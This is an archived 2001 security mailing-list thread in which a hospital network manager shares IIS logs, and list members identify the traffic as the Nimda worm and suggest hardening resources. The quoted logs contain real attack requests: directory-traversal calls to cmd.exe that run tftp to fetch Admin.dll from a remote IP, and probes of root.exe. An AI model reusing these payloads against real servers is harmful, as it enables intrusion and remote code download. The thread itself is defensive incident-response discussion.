RE: [RE: [RE: Any leads?]]

From: dldean (dldean@private)
Date: Fri Sep 21 2001 - 14:46:55 PDT

  • Next message: dldean: "RE: [RE: [RE: Any leads?]]"

    Mike,
    
    Here is a good starting place
    
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
    
    This link is for a Microsoft TechNet page describing security issue for web
    sites. They also have a "batten down the hatches" script for IIS but I
    cannot find the url for that page.
    
    
    Doug
    > -----Original Message-----
    > From: owner-crime@/var/spool/majordomo/lists/crime
    > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of
    > J.Michael Cuciti
    > Sent: Friday, September 21, 2001 2:33 PM
    > To: dldean; Kuo Jimmy
    > Cc: crime@private
    > Subject: Re: [RE: [RE: Any leads?]]
    >
    >
    > Yes, I am 206.98.124.52.  The ADMIN.DLL file was deleted and the
    > directories
    > the event view is referencing do not exist on my system. I have
    > followed all
    > instruction for removal from variuos postings from CRIME.  No
    > file refernced
    > in posting are on my system.
    >
    > Do any of you know how I might stop this attack?
    >
    > -Mike
    >
    >
    >
    > dldean@private (dldean) wrote:
    > This is 206.98.124.52 receiving get requests for the admin.dll from
    > 206.98.79.246  and directory requests for his machine from
    > 206.252.224.50 &
    > 208.238.181.162 .
    >
    > Doug
    >
    > > -----Original Message-----
    > > From: owner-crime@/var/spool/majordomo/lists/crime
    > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
    > > Jimmy
    > > Sent: Friday, September 21, 2001 2:06 PM
    > > Cc: crime@private
    > > Subject: RE: [RE: Any leads?]
    > >
    > >
    > > Oh, I didn't notice the followup questions you asked the first time.
    > >
    > > I don't know about the structure of your logs.  But are you
    > 206.98.124.52?
    > >
    > > Could someone who reads IIS logs say if this is him sending or receiving
    > > GETs?
    > >
    > > And this is definitely Nimda.  I just don't know if you're the
    > > target or the
    > > culprit.  If you haven't upgraded, I'm tempting to believe
    > you're infected
    > > and attacking others.  The TFTP command shows up only on or after
    > > infection.
    > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something
    > > that shows
    > > up after infection.  But then you say you don't have it...
    > >
    > > Jimmy
    > >
    > > > -----Original Message-----
    > > > From:	J.Michael Cuciti [SMTP:mcuciti@private]
    > > > Sent:	Friday, September 21, 2001 1:44 PM
    > > > To:	Kuo Jimmy; Crispin Cowan; Jimmy Sadri
    > > > Cc:	crime@private
    > > > Subject:	Re: [RE: Any leads?]
    > > >
    > > > All:
    > > >
    > > > I still have a script trying to run, but the location and
    > folder doesn't
    > > > exist.  The is what I found in my log file:
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW,
    > 206.98.124.52, 150, 151,
    > > > 304,
    > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW,
    > 206.98.124.52, 180, 151,
    > > > 304,
    > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
    > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW,
    > 206.98.124.52, 10, 72,
    > > > 273,
    > > > 403, 5, GET, /scripts/root.exe, /c+dir,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW,
    > 206.98.124.52, 80, 96,
    > > > 1652,
    > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW,
    > 206.98.124.52, 10, 97,
    > > > 243,
    > > > 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > If anybody knows what this is, please 'spain it to me.
    > > >
    > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I
    > > inherited this, not
    > > > my
    > > > fault :-) )
    > > >
    > > > In the event log I see this same type of message running every few
    > > > minutes.
    > > > The script is supposedly running from
    > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    > > >
    > > > Thanks...
    > > >
    > > > Mike Cuciti
    > > > Network Service and Support MAnager
    > > > Tuality Healthcare
    > > > 681.1749
    > > >
    > > >
    > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    > > > >The Melissa author was caught because he posted the infectious
    > > document
    > > > >from his own AOL account to a news group, rather than releasing it
    > > > >through a hacked account. His guilt was confirmed when the
    > > serial number
    > > > >in the document matched the PC in the dumpster outside his
    > bedroom :-)
    > > >
    > > > No.  He used a hacked acct.  But we identified the exact time
    > of the use
    > > > of
    > > > the acct (newsgroup posting message ID) and the FBI traced the phone
    > > > records.
    > > >
    > > > And the PC was destroyed and never located.
    > > >
    > > > Where did you get your version of the story?
    > > >
    > > > >But Code Red and its derivatives is not an Office document, and
    > > > >therefore has no serial numbers. That investigators appear to have no
    > > > >leads months after Code Red appeared tells me that it was likely
    > > > >released to the wild from a compromised machine, or perhaps
    > > > >simultaneously released from multiple compromised machines. If the
    > > > >author(s) were good, then those compromised machines were initially
    > > > >attacked from other compromised machines. Likely all of these initial
    > > > >release vector machines have long since been wiped and
    > > re-installed, and
    > > > >the links to the author(s) have been cut.
    > > >
    > > > We have some "first instances" of traffic.  I don't know what
    > the FBI's
    > > > doing with the information gathered so far.  But I agree that it's
    > > > difficult
    > > > and not likely.
    > > >
    > > > Jimmy
    > >
    >
    >
    >
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:48 PDT